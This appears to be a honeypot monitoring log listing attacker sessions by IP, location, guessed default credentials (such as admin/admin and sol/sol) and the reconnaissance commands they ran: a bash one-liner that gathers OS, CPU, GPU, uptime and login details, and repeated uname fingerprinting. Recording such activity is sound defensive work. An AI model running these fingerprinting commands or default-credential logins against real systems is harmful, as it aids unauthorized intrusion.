$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 pretzel_root_18 (167.99.244.212) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-02 13:41 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 star_root_22 (165.245.135.25) — Douglasville, United States · 3 sessions · 12 cmds

2026-03-02 11:52 EST · as oracle/oracle, postgres/postgres, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 eagle_root_23 (64.23.234.226) — Santa Clara, United States · 1 session · 4 cmds

2026-03-02 11:35 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 reef_root_8 (170.64.136.104) — Sydney, Australia · 1 session · 4 cmds

2026-03-02 11:35 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 barbie_sol (134.199.166.218) — Sydney, Australia · 10 sessions · 10 cmds

2026-03-02 10:51 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×10

🎭 crumpet_sol_4 (143.110.169.194) — Slough, United Kingdom · 84 sessions · 84 cmds

2026-03-01 17:57 EST · as sol/123456, sol/12345678, sol/sol

Ran uname 84x across 84 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×84

↳ obfuscated system check

🎭 crumpet_sol_3 (209.38.167.114) — Slough, United Kingdom · 10 sessions · 10 cmds

2026-03-02 09:48 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×10

🎭 tea_sol (161.35.172.20) — Slough, United Kingdom · 6 sessions · 6 cmds

2026-03-02 01:14 EST · as sol/sol, solana/solana, ubuntu/ubuntu

Ran uname 6x across 6 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×6

↳ obfuscated system check

🎭 cowboy_sol_3 (134.199.203.41) — Douglasville, United States · 4 sessions · 4 cmds

2026-03-02 03:46 EST · as solana/solana, ubuntu/ubuntu, validator/validator

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×4

↳ obfuscated system check

🎭 gouda_sol_7 (159.223.13.92) — Amsterdam, Netherlands · 40 sessions · 40 cmds

2026-03-01 16:50 EST · as firedancer/firedancer, raydium/raydium, sol/123

Ran uname 40x across 40 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×40

↳ obfuscated system check

🎭 scone_root_4 (209.97.141.141) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-03-02 07:18 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 beefeater_root (167.71.138.96) — Slough, United Kingdom · 10 sessions · 40 cmds

2026-03-02 07:00 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 yankee_sol_2 (157.230.83.231) — North Bergen, United States · 16 sessions · 16 cmds

2026-03-02 07:20 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 lotus_root_16 (143.110.240.222) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-02 07:50 EST · as postgres/postgres, root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 bike_root_13 (142.93.136.45) — Amsterdam, Netherlands · 12 sessions · 48 cmds

2026-03-02 07:18 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 fog_root_14 (139.59.177.145) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-02 07:01 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 poutine_root_4 (147.182.147.129) — Toronto, Canada · 3 sessions · 12 cmds

2026-03-02 06:57 EST · as oracle/oracle, postgres/postgres, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 stein_root_22 (104.248.45.206) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-02 06:16 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 phantom_root_48 (159.89.203.77) — Singapore, Singapore · 6 sessions · 24 cmds

2026-03-02 06:07 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 dutch_root_12 (159.223.211.109) — Amsterdam, Netherlands · 8 sessions · 32 cmds

2026-03-02 06:05 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 pretzel_root_2 (138.197.188.50) — Frankfurt am Main, Germany · 9 sessions · 36 cmds

2026-03-02 05:15 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 moose_root_8 (147.182.154.67) — Toronto, Canada · 6 sessions · 24 cmds

2026-03-02 06:05 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 spice_root_2 (157.245.107.109) — Bengaluru, India · 9 sessions · 36 cmds

2026-03-02 05:18 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 9x)

